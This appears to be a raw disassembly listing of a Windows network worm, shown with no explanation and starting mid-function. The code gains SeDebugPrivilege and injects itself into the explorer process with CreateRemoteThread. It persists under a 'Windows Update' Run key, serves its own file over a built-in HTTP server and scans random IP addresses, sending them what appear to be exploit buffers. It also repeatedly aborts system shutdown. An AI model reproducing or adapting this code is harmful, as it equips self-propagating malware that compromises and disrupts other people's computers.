push 0DEh
push offset dword_309046F0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
cmp eax, 46h
jl loc_30901D04
cmp [ebp+var_730], 31h
jnz loc_30901BAF
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_30902C36 ; memset
add esp, 0Ch
push offset byte_309042F0
call dword_30901084 ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset byte_309042F0
push eax
call sub_30902C42 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_30901084 ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_30902C42 ; memcpy
mov eax, dword_30904BF6
add esp, 0Ch
mov [ebp+var_798], eax
loc_30901A50: ; CODE XREF: sub_309017B9+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 68h
push offset dword_30904834
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0A0h
push offset dword_309048A0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
cmp [ebp+arg_0], 0
jz loc_30901C9F
push 68h
lea eax, [ebp+var_89E4]
push offset dword_30904A58
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_30902C42 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_30904AC4
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_30902C42 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_30904B38
push eax
call sub_30902C42 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D04
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_30901CF7
; ---------------------------------------------------------------------------
loc_30901BAF: ; CODE XREF: sub_309017B9+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_30902C36 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_30904C30
push eax
call sub_30902C42 ; memcpy
push offset byte_309042F0
call sub_30902C3C ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_309042F0
push eax
call sub_30902C42 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_30904CA8
push eax
call sub_30902C42 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_30904C30
push eax
call sub_30902C42 ; memcpy
add esp, 40h
push offset byte_309042F0
call sub_30902C3C ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_309042F0
push eax
call sub_30902C42 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_30901C4B: ; CODE XREF: sub_309017B9+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_30901C4B
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_30902C36 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_30902C36 ; memset
add esp, 18h
jmp loc_30901A50
; ---------------------------------------------------------------------------
loc_30901C9F: ; CODE XREF: sub_309017B9+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_30904944
push eax
call sub_30902C42 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_30902C42 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_309049C4
push eax
call sub_30902C42 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_30901CF7: ; CODE XREF: sub_309017B9+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_30901D04: ; CODE XREF: sub_309017B9+1AD�j
; sub_309017B9+1E1�j ...
push 2
push [ebp+var_4]
call dword_3090116C ; shutdown
loc_30901D0F: ; CODE XREF: sub_309017B9+166�j
push [ebp+var_4]
call dword_30901170 ; closesocket
pop esi
loc_30901D19: ; CODE XREF: sub_309017B9+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_309017B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901D20 proc near ; CODE XREF: UPX0:loc_30902321�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_309010A4 ; LoadLibraryA
mov esi, dword_309010A0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_30901DA4
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_30901DA4
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_30901DA4
lea eax, [ebp+var_C]
push eax
push 20h
call dword_3090109C ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_30901DA4: ; CODE XREF: sub_30901D20+28�j
; sub_30901D20+37�j ...
pop edi
pop esi
leave
retn
sub_30901D20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901DA8 proc near ; CODE XREF: UPX0:30902335�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_30904FE0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_309010B0 ; GetModuleHandleA
mov esi, dword_309010A0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_30901DEF
loc_30901DEB: ; CODE XREF: sub_30901DA8+54�j
push 1
jmp short loc_30901E40
; ---------------------------------------------------------------------------
loc_30901DEF: ; CODE XREF: sub_30901DA8+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_30901DEB
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_3090110C ; FindWindowA
test eax, eax
jnz short loc_30901E1D
call dword_30901110 ; GetForegroundWindow
test eax, eax
jnz short loc_30901E1D
push 2
jmp short loc_30901E40
; ---------------------------------------------------------------------------
loc_30901E1D: ; CODE XREF: sub_30901DA8+65�j
; sub_30901DA8+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_30901114 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_309010AC ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_30901E43
push 3
loc_30901E40: ; CODE XREF: sub_30901DA8+45�j
; sub_30901DA8+73�j
pop eax
jmp short loc_30901EAE
; ---------------------------------------------------------------------------
loc_30901E43: ; CODE XREF: sub_30901DA8+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3090107C
test eax, eax
jz short loc_30901EA1
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_309010A8 ; WriteProcessMemory
push dword_30904FD4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_30901E8D
push eax
call esi ; CloseHandle
jmp short loc_30901EA8
; ---------------------------------------------------------------------------
loc_30901E8D: ; CODE XREF: sub_30901DA8+DE�j
push offset aUterm14 ; "uterm14"
call sub_30901EE1
pop ecx
mov [ebp+var_4], 5
jmp short loc_30901EA8
; ---------------------------------------------------------------------------
loc_30901EA1: ; CODE XREF: sub_30901DA8+B2�j
mov [ebp+var_4], 4
loc_30901EA8: ; CODE XREF: sub_30901DA8+E3�j
; sub_30901DA8+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_30901EAE: ; CODE XREF: sub_30901DA8+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901DA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901EB3 proc near ; CODE XREF: sub_3090216F+B�p
; UPX0:309022F7�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_309010B4 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_309010E8 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901EB3 endp
; =============== S U B R O U T I N E =======================================
sub_30901EE1 proc near ; CODE XREF: sub_30901DA8+EA�p
; UPX0:30902301�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_309010B8 ; CreateMutexA
retn
sub_30901EE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901EF0 proc near ; CODE XREF: sub_3090235D+107�p
; sub_3090235D+112�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010BC ; CreateThread
pop ebp
retn
sub_30901EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F0A proc near ; CODE XREF: sub_3090216F+12C�p
; sub_30902520+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010BC ; CreateThread
push eax
call dword_3090107C ; CloseHandle
pop ebp
retn
sub_30901F0A endp
; =============== S U B R O U T I N E =======================================
sub_30901F2B proc near ; CODE XREF: sub_309011A0+68�p
; sub_309029F1+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_30901F53
loc_30901F3C: ; CODE XREF: sub_30901F2B+26�j
call dword_309010F8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_30901F3C
loc_30901F53: ; CODE XREF: sub_30901F2B+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_30901F2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F5B proc near ; CODE XREF: sub_309011A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_30902C36 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_309010C0 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3090107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_30901F5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901FB1 proc near ; CODE XREF: sub_309025A8+3E�p
; sub_3090266F+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_30901148 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_30901FD2
call dword_3090114C ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_30901FD2: ; CODE XREF: sub_30901FB1+15�j
lea eax, [ebp+var_34]
push eax
call dword_30901150 ; gethostbyname
test eax, eax
jnz short loc_30901FE7
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_30901FE7: ; CODE XREF: sub_30901FB1+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_30901FB1 endp
; =============== S U B R O U T I N E =======================================
sub_30901FF0 proc near ; CODE XREF: sub_309024BC+22�p
; sub_30902520+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3090112C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_30901FF0 endp
; =============== S U B R O U T I N E =======================================
sub_30902006 proc near ; CODE XREF: sub_3090235D+40�p
; sub_3090235D+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_309010C8 ; OpenEventA
test eax, eax
jz short locret_3090201F
push eax
call dword_309010C4 ; SetEvent
locret_3090201F: ; CODE XREF: sub_30902006+10�j
retn
sub_30902006 endp
; =============== S U B R O U T I N E =======================================
sub_30902020 proc near ; CODE XREF: sub_3090169C+29�p
push esi
mov esi, dword_309010F8
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_30902020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902036 proc near ; DATA XREF: sub_3090216F+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_30901168 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_30902067
push 1
jmp loc_30902122
; ---------------------------------------------------------------------------
loc_30902067: ; CODE XREF: sub_30902036+28�j
mov esi, dword_30901100
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_30902125
lea eax, [ebp+var_100]
push offset dword_30904228
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_30902125
mov esi, dword_30901164
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_30904FD0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_30901118 ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_30902C3C ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_309020E4: ; CODE XREF: sub_30902036+E8�j
mov eax, dword_30904FD0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_309020F6
mov eax, ecx
loc_309020F6: ; CODE XREF: sub_30902036+BC�j
test eax, eax
jz short loc_30902143
push 0
push eax
mov eax, dword_30904FC8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_30902120
cmp eax, 1000h
jb short loc_30902143
push 64h
add edi, eax
call dword_30901094 ; Sleep
jmp short loc_309020E4
; ---------------------------------------------------------------------------
loc_30902120: ; CODE XREF: sub_30902036+D5�j
push 2
loc_30902122: ; CODE XREF: sub_30902036+2C�j
pop eax
jmp short loc_30902168
; ---------------------------------------------------------------------------
loc_30902125: ; CODE XREF: sub_30902036+49�j
; sub_30902036+61�j
mov esi, dword_30901164
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_30904D70
push ebx
call esi ; send
loc_30902143: ; CODE XREF: sub_30902036+C2�j
; sub_30902036+DC�j
push 7D0h
call dword_30901094 ; Sleep
push 2
push ebx
call dword_3090116C ; shutdown
push ebx
call dword_30901170 ; closesocket
push 0
call dword_309010CC ; ExitThread
xor eax, eax
loc_30902168: ; CODE XREF: sub_30902036+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_30902036 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090216F proc near ; DATA XREF: sub_3090235D+102�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_30901EB3
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_30904FCC, ebx
call sub_309027DF
add esp, 14h
test eax, eax
jnz loc_309022A4
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_30901080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_309021DB
push 1
call dword_309010CC ; ExitThread
loc_309021DB: ; CODE XREF: sub_3090216F+62�j
push ebx
push esi
call dword_309010D4 ; GetFileSize
push eax
mov dword_30904FD0, eax
call sub_30902BFB
pop ecx
mov dword_30904FC8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_30904FD0
push eax
push esi
call dword_309010D0 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_30904FD0, eax
call dword_3090107C ; CloseHandle
push ebx
push 1
push 2
call dword_30901154 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_30902C36 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_3090223D: ; CODE XREF: sub_3090216F+E5�j
; sub_3090216F+ED�j ...
call dword_309010F8 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_30904FDC, eax
jz short loc_3090223D
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_3090223D
push eax
call dword_3090115C ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_3090113C ; bind
test eax, eax
jnz short loc_3090223D
push 64h
push edi
call dword_30901140 ; listen
mov [ebp+var_8], esi
pop esi
loc_30902286: ; CODE XREF: sub_3090216F+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_30901144 ; accept
push eax
push offset sub_30902036
call sub_30901F0A
pop ecx
pop ecx
jmp short loc_30902286
; ---------------------------------------------------------------------------
loc_309022A4: ; CODE XREF: sub_3090216F+3D�j
push ebx
call dword_309010CC ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_3090216F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309022B3 proc near ; CODE XREF: sub_3090235D:loc_30902459�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_30901138
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_309022B3 endp
; ---------------------------------------------------------------------------
loc_309022DF: ; CODE XREF: UPX1:30906C58�j
push 0
call dword_309010B0 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_30904FE0, eax
call dword_309010E0 ; DeleteFileA
call sub_30901EB3
push offset aUterm14 ; "uterm14"
call sub_30901EE1
pop ecx
mov dword_30904FD4, eax
call dword_309010DC ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_30902321
push 1
call dword_309010D8 ; ExitProcess
loc_30902321: ; CODE XREF: UPX0:30902317�j
call sub_30901D20
call sub_30902943
call sub_30902ABD
push offset sub_3090235D
call sub_30901DA8
test eax, eax
pop ecx
jz short loc_30902346
push 0
call sub_3090235D
loc_30902346: ; CODE XREF: UPX0:3090233D�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_30902349 proc near ; CODE XREF: sub_3090235D:loc_30902482�p
; sub_309024BC:loc_309024D5�p ...
push 0
push dword_30904FD8
call dword_30901074 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_30902349 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090235D proc near ; CODE XREF: UPX0:30902341�p
; DATA XREF: UPX0:30902330�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901188
push offset loc_30902C30
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU14x ; "u14x"
xor edi, edi
push edi
push 1
push edi
call dword_30901070 ; CreateEventA
mov dword_30904FD8, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU11x ; "u11x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU12x ; "u12x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU13x ; "u13x"
call sub_30902006
mov [esp+0Ch+var_C], offset aU8 ; "u8"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU9 ; "u9"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU10 ; "u10"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU11 ; "u11"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU12 ; "u12"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU13 ; "u13"
call sub_30901EE1
mov [esp+0Ch+var_C], offset aU14 ; "u14"
call sub_30901EE1
pop ecx
cmp [ebp+arg_0], edi
jz short loc_30902459
push offset aWs2_32 ; "ws2_32"
mov esi, dword_309010A4
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm14 ; "uterm14"
call sub_30901EE1
pop ecx
mov dword_30904FD4, eax
loc_30902459: ; CODE XREF: sub_3090235D+C1�j
call sub_309022B3
push edi
push offset sub_3090216F
call sub_30901EF0
push edi
push offset sub_3090169C
call sub_30901EF0
push edi
push offset loc_309026CB
call sub_30901EF0
add esp, 18h
loc_30902482: ; CODE XREF: sub_3090235D+140�j
call sub_30902349
test eax, eax
jnz short loc_3090249F
push edi
call dword_30901018 ; AbortSystemShutdownA
push 1388h
call dword_30901094 ; Sleep
jmp short loc_30902482
; ---------------------------------------------------------------------------
loc_3090249F: ; CODE XREF: sub_3090235D+12C�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_3090235D endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309024BC proc near ; DATA XREF: sub_30902520+55�o
; sub_309025A8+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_309024CB
push 1
pop eax
jmp short locret_3090251C
; ---------------------------------------------------------------------------
loc_309024CB: ; CODE XREF: sub_309024BC+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_309024D5: ; CODE XREF: sub_309024BC+5A�j
call sub_30902349
test eax, eax
jnz short loc_30902518
call sub_30901FF0
test eax, eax
jz short loc_30902518
cmp [ebp+var_1], bl
jz short loc_30902511
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_309017B9
movzx esi, word_30904FEC
pop ecx
call dword_309010F8 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_30901094 ; Sleep
loc_30902511: ; CODE XREF: sub_309024BC+2E�j
inc bl
cmp bl, 0FFh
jb short loc_309024D5
loc_30902518: ; CODE XREF: sub_309024BC+20�j
; sub_309024BC+29�j
pop esi
xor eax, eax
pop ebx
locret_3090251C: ; CODE XREF: sub_309024BC+D�j
leave
retn 4
sub_309024BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902520 proc near ; DATA XREF: sub_309025A8+7E�o
; UPX0:30902760�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3090252E
push 1
pop eax
jmp short loc_309025A4
; ---------------------------------------------------------------------------
loc_3090252E: ; CODE XREF: sub_30902520+7�j
push ebx
push esi
push edi
call sub_30901EB3
mov esi, dword_309010F8
xor ebx, ebx
loc_3090253E: ; CODE XREF: sub_30902520+7D�j
call sub_30902349
test eax, eax
jnz short loc_3090259F
call sub_30901FF0
test eax, eax
jz short loc_3090259F
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_30904FE4
mov byte ptr [ebp+arg_0+3], al
call dword_3090106C ; InterlockedIncrement
push [ebp+arg_0]
call sub_309017B9
test eax, eax
pop ecx
jnz short loc_30902581
push [ebp+arg_0]
push offset sub_309024BC
call sub_30901F0A
pop ecx
pop ecx
loc_30902581: ; CODE XREF: sub_30902520+50�j
movzx edi, word_30904FEC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_30901094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_3090253E
loc_3090259F: ; CODE XREF: sub_30902520+25�j
; sub_30902520+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_309025A4: ; CODE XREF: sub_30902520+C�j
pop ebp
retn 4
sub_30902520 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309025A8 proc near ; DATA XREF: UPX0:30902778�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_30901EB3
call sub_30902349
test eax, eax
jnz loc_30902661
push ebx
mov ebx, dword_30901094
push esi
mov esi, dword_309010F8
push edi
loc_309025CE: ; CODE XREF: sub_309025A8+48�j
; sub_309025A8+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_309025DD: ; CODE XREF: sub_309025A8+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_309025DD
call sub_30901FB1
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_309025CE
call sub_30901FF0
test eax, eax
jz short loc_30902639
push offset dword_30904FE4
call dword_3090106C ; InterlockedIncrement
push edi
call sub_309017B9
test eax, eax
pop ecx
jnz short loc_30902640
push edi
push offset sub_309024BC
call sub_30901F0A
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_30902625: ; CODE XREF: sub_309025A8+8D�j
push edi
push offset sub_30902520
call sub_30901F0A
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_30902625
jmp short loc_30902640
; ---------------------------------------------------------------------------
loc_30902639: ; CODE XREF: sub_309025A8+51�j
push 2710h
call ebx ; Sleep
loc_30902640: ; CODE XREF: sub_309025A8+67�j
; sub_309025A8+8F�j
movzx edi, word_30904FEC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_30902349
test eax, eax
jz loc_309025CE
pop edi
pop esi
